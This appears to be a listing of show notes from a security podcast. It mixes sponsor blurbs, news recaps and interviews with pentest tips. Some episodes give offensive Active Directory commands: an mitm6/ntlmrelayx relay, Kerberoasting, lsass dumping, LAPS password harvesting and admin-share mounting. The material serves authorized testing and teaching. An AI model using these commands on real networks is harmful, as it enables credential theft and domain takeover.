- Know all the mimikatz commands and switches and when to apply them
View this episode's show notes for more information
Published: Friday, February 19, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey everybody! Sorry that we're late...
- I got to use some of my new CRTP skills!
- Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:
- Check for misconfigured LAPS installs with Get-LAPSPasswords !
- The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn +ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!
- When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!
- SharpShares is a cool way to find shares your account has access to.
- I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information
- Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:
- Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!
- Armed with all the local admin passwords, I was able to run net use Q: \VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)
View this episode's show notes for more information
Published: Thursday, February 11, 2021
This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...
- Sudo bug gives root access to mass numbers of Linux systems!
- What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English
- Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want
- Sonicwall was hacked using zero days in its own products . After recording this news segment, Sonicwall issued an updated statement on the situation
View this episode's show notes for more information
Published: Thursday, February 04, 2021
This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...
- Brian's Chris Farley moment with Marcello
- Marcello's infosec origin story
- CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME
- Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord .
- What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding?
- What the heck is Nim and why is Marcello so excited about OffensiveNim ?
View this episode's show notes for more information
Published: Thursday, January 28, 2021
Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called [Enterprise Attacker Emulation and C2 Implant...
- The Fargo TV series
- Our upcoming interview with Marcello (a.k.a. byt3bl33d3r ) from BHIS
- This Key and Peele sketch
- I just took my CRTP exam, which we've talked about a lot in the past
- 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r
View this episode's show notes for more information
Published: Friday, January 22, 2021
Today we talk about a cool product called Deep Freeze , which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with...
View this episode's show notes for more information
Published: Friday, January 15, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends! We're continuing our...
View this episode's show notes for more information
Published: Thursday, January 07, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Happy new year! This episode continues...
View this episode's show notes for more information
Published: Wednesday, December 30, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today,...
- We agree this is not a certification for folks who are new to pentesting
- Don't expect to be following along "live" with the instructor during the training sessions
- You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions
- As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel
- Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewall config!
- The more PowerShell skills you can walk into this training with, the better.
- We've got to play with some tools that were new(ish) to us: PowerUpSQL - check out these awesome cheat sheets too! HeidiSQL Rubeus
- PowerUpSQL - check out these awesome cheat sheets too!
- HeidiSQL
- Rubeus
- If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam!
- Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective!
- A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.
View this episode's show notes for more information
Published: Wednesday, December 23, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Merry Christmas! Happy holidays! Please...
- You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details.
- Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats
- CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!
View this episode's show notes for more information
Published: Thursday, December 17, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode...
- It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources
- Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts.
- Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh.
- Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this . It looks awesome. And the devs of the tool have a video on it here .
- When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.
View this episode's show notes for more information
Published: Wednesday, December 09, 2020
Start or grow your IT career with online IT training from ITProTV, and we have a special offer for 7 Minute Security listeners: sign up and save 30% off all plans! Visit https://itpro.tv/7ms to learn more.Welp, I need another certification like I need a hole in the head, but that...
- Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module
- I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps.
- When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before: HFS - simple HTTP file server Powercat - for catching shells!
- HFS - simple HTTP file server
- Powercat - for catching shells!
- The Thanksgiving surprise that brought tears to my eyes
- The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag
- A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break
View this episode's show notes for more information
Published: Wednesday, December 02, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Happy December! Today...
- Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team
- Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there
- Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!
View this episode's show notes for more information
Published: Thursday, November 26, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Happy Thanksgiving!...
- It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know.
- We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked .
- Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes.
- As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.
View this episode's show notes for more information
Published: Thursday, November 19, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends, I dare declare this to be...
- Great blue team tools alerting our customer to a lot of the stuff we were doing
- An EDR that we tried to beat up (but it beat us up instead)
- SharpGPOAbuse which we talked about extensively last week
- Separation of "everyday" accounts from privileged accounts
- Multi-factor authentication bypass!
- Some delicious findings in GPOs thanks to Ryan Hausec's great two part series ( 1 and 2 ). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.
View this episode's show notes for more information
Published: Sunday, November 15, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hello friends! Sorry to be late with...
- A little welcome music that is not the usual scatting of gibberish I torture you with
- Some cool tools I'm playing with in the lab that we'll do future episodes on in the future: DetectionLab to practice detecting all the bad things! BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want. Cobalt Strike - we're doing a demo right now!
- DetectionLab to practice detecting all the bad things!
- BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want.
- Cobalt Strike - we're doing a demo right now!
View this episode's show notes for more information
Published: Sunday, November 08, 2020
Start or grow your IT career with online IT training from ITProTV, and we have a special offer for 7 Minute Security listeners: sign up and save 30% off all plans! Visit ITPro.tv/7MS to learn more.Hi! Sorry to be so late with this episode, but I'm excited to share with you...
- We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender!
- Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more!
- Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts
- Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!
View this episode's show notes for more information
Published: Thursday, October 29, 2020
Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS ! He's also working on a [new cert](https://bootcamps.pentesteracademy.com/course/active-...
- Azure AD is a single point of failure in many networks
- Ransomware sophistication continues to grow - as demonstrated in this story , this one and this one
- Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less
- Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-)
View this episode's show notes for more information
Published: Wednesday, October 21, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Yay - I'm a...
- PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!)
- Flashcards from Cram
- Flashcards from Quizlet
- My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested)
- Flashcards from ProProfs
- Documentation from PCI Web site itself - specifically the glossary , quick reference guide and my personal favorite, the prioritized approach guidance
View this episode's show notes for more information
Published: Wednesday, October 14, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hello! This episode...
- Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack ) says this video demonstrates why he really loves it.
- Prometheus , recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory.
- Follow Through by Gavin DeGraw
- Livin' on a Prayer
- The Look that Says You Love Me (Brian Johnson)
- Goodness of God
View this episode's show notes for more information
Published: Wednesday, October 07, 2020
Start or grow your IT career with online IT training from ITProTV, and we have a special offer for 7 Minute Security listeners: sign up and save 30% off all plans! Visit ITPro.tv/7MS to learn more.Hey, hope you're having a great week! The last few weeks have had somewhat...
- Double-check that any device you have that supports full-disk encryption has it enabled
- On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years)
- Got old PCs sitting around you're not using? Nuke 'em with DBAN .
- Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!)
- Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage
- Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly
- Handling password hashes? Here's one way to setup an encrypted partition for them
- You can clean old email from Gmail quickly using some simple searches . You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird
View this episode's show notes for more information
Published: Sunday, October 04, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hi again! It's sort...
- Nagios - it's old school but gets the job done. This article helped me get it going on an RPi.
- SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor
- PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!
- Another epic run-in with Caribou Coffee stores
- How I ate a huge slice of Apple-flavored humble pie in front of a tech support person
View this episode's show notes for more information
Published: Thursday, October 01, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.WE'RE HOME! After...
- Setting up a ioT dedicated wireless network
- Quarantining it so it can only talk to the Internet
- Poking holes in the firewall to allow ioT DNS requests to be captured
- Scanning your ioT for services and potential default/weak cred use
View this episode's show notes for more information
Published: Wednesday, September 23, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me]( https://safepass.me/?7ms433 for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hi!...
- Cybersecurity skills gap (powered by lack of career development!)
- Which cyber jobs are hot - or not?
- Mysterious wave of DDoS attacks
- The Magecart threat group pwns thousands of ecommerce sites
View this episode's show notes for more information
Published: Wednesday, September 16, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Yay! It's time for...
- Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.
- Why lsassy is my new best friend.
- I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:
View this episode's show notes for more information
Published: Wednesday, September 09, 2020
Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall:.
- 7MS hired a VP of sales and marketing: Clyde Cooper !
- We've added some new tools to our tools/services gist :Having a true sales force for the first time has prompted us to invest in Salesforce . There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
- Having a true sales force for the first time has prompted us to invest in Salesforce . There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)
- We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
- Recording an "about us" video with a production company is exciting, stressful and awkward
- Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives
- For really no reason at all, I sing for you a bit in this episodeOn that note, I absolutely love this song . I feel like it's my family's theme song for the last year.
- On that note, I absolutely love this song . I feel like it's my family's theme song for the last year.
View this episode's show notes for more information
Published: Wednesday, September 02, 2020
Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's [upcoming Webinar about runbooks on September...
- What are the (good) warning signs that a passion project you have could be a viable business?
- Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-)
- At what point does a side project have to become what you do for your day job?
- How do you safely prepare to quit a comfortable corporate life to life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two?
- How important is it to have the support of your friends/family when starting a new biz?
- Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)?
- When is it time to hire additional resources or raise additional money to support your growing business?
- What marketing efforts are fruitful for a new security biz to spend time/money on?
- How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both?
- What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)
View this episode's show notes for more information
Published: Thursday, August 27, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hola! We're back...
- The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost
- Garmin's personal and painful experience with ransomware
- Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware
- Are we ready to endure a cyber crisis ?
- Would you fall for this social engineering attack ?
View this episode's show notes for more information
Published: Wednesday, August 19, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me]( https://safepass.me/?7ms428 for more details, and tell them 7 Minute Security sent you to get a 10% discount!Welcome...
- My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!)
- PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings.
- eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more.
- House updates
- Fighting with the man/woman upstairs
- My worst Webinar nightmare came true
- A socially distanced wedding singing experience
View this episode's show notes for more information
Published: Wednesday, August 12, 2020
Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:Misconfigured cloud...
- Why is this such a common issue, and how can we address it?
- Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
- What tools can we use to better secure our cloud databases?
- How can we secure sensitive information as we migrate it from LAN side to the cloud?
- What is the CCPA? How does it relate to GDPR?
- If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know?
- Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
- Does CCPA only apply to California residents and companies?
- What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns?
- What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?
- What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?
View this episode's show notes for more information
Published: Friday, August 07, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.First and foremost, I...
- If you've collected a ton of hashes with Responder , the included DumpHash.py gives you a lovely organized list of collected hashes!
- Here's one way you can grab the latest CME binary:
- If you're looking to block IPv6 (ab)use in your environment, this article has some great tips.
- When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team
- Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.
- A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to.
- I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more!
- Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.
View this episode's show notes for more information
Published: Thursday, July 30, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode is...
- Turn on RDP with PowerShell:
- Change time zone with command line:
- Install Chrome with PowerShell:
- Install PowerUpSQL:
- Turn off sleepy time:
- Install DotNet 3.5:
- Refresh the SSH keys:
- Get SharpHound and Mimikatz:
- Install pypykatz
- Install CrackMapExec binaries (which at time of this publication is this one):
View this episode's show notes for more information
Published: Wednesday, July 22, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hello! We're back...
- Hackers are trying to steal admin passwords from F5 devices
- Secret service reports increase in hacked MSPs
- Most Popular Home Routers Have ‘Critical’ Flaws
- "Sigred" DNS vulnerability in Microsoft DNS
View this episode's show notes for more information
Published: Wednesday, July 15, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.This is an especially...
- Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
- Testing the egress firewall is easy with this script . Consider this SANS article for guidance on ports to lock down.
- Testing for MS14-025 is easy with this site .
- mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article . It's especially handy/focused when you create a targets.txt that looks something like this:
- I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!
- Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.
- Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share
- Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:
View this episode's show notes for more information
Published: Friday, July 10, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's episode continues the work we...
- Acceptable use
- Data protection and privacy
View this episode's show notes for more information
Published: Wednesday, July 01, 2020
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- The episode has been crafted by a professional podcast producer
- The episode has been transcribed by a professional transcription service
View this episode's show notes for more information
Published: Friday, June 26, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode is a...
- Capturing hashes with Responder
- Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
- Check for MS14-025 (see this article )
- Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it
- Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf)
- Test for egress filtering of ports 1-1024
- Took a backup of AD " the Microsoft way " and then cracked with secretsdump:
View this episode's show notes for more information
Published: Tuesday, June 23, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...
- Acceptable Use
- Data Protection and Privacy
- Physical Security
- Tools and Technology
- Training and Awareness
- Reporting
View this episode's show notes for more information
Published: Friday, June 12, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's episode is all about mental...
View this episode's show notes for more information
Published: Thursday, June 04, 2020
This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...
- Why, IMHO you should only do credentialed scans
- Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)
- How to make your scan report more actionable and less unruly
- Turning up logging to 11 (use with caution!)
- A small tweak to an external scan policy that can result in the difference between a successful or failed scan
- The nessusd.rules file is awesome for excluding specific hosts and services from your scans
View this episode's show notes for more information
Published: Thursday, May 28, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...
- WARNING! WARNING! Upgrading from 4.x is a one-way operation!
- Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them)
- More granular detail (especially if there are issues) when blocklists get updated
- Better, richer debug log output
View this episode's show notes for more information
Published: Thursday, May 21, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode kicks...
- Salt stack RCE ( Daily Swig / Cyber Scoop )
- Malware uses Corporate MDM as attack vector ( Checkpoint )
- Critical vulns in Sharefile ( Citrix )
- Shareholders sue Labcorp over their 'persistent' failure to secure data ( Cyberscoop )
View this episode's show notes for more information
Published: Thursday, May 14, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today I'm excited to share more tales...
View this episode's show notes for more information
Published: Thursday, May 07, 2020
This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...
- The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)
- How and why payment card data is leaked/stolen/breached - and then sold/monetized
- The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE
View this episode's show notes for more information
Published: Sunday, May 03, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In today's episode we share some tips for working...
- Picking powerful passwords
- Locking down your wifi
- Defending your digital identity
- Protecting your PC
- Blocking icky stuff in your browser
- Composing careful conference calls
- Clicking links carefully
View this episode's show notes for more information
Published: Friday, April 24, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today is sort of a continuation of...
- Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!
- CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle , and even better, they offer online testing during this stay-at-home time!
- Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums .
- I'm really digging the Done app because it's making me feel like I can set reasonable goals and track them simply while not stressing over them anymore.
- Gitbook is my new favorite place to dump documentation. Check out my Codenewb example.
View this episode's show notes for more information
Published: Thursday, April 16, 2020
View this episode's show notes for more information
Published: Thursday, April 09, 2020
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today I'm starting a journey to become a...
- Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards
- Understanding of PCI DSS requirements and intent
- Overview of basic payment industry terminology
- Understanding the transaction flow
- Implementing a risk-based prioritized approach
- Appropriate uses of compensating controls
- Working with third-parties and service providers
- How and when to use Self-Assessment Questionnaires (SAQs)
- Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud)
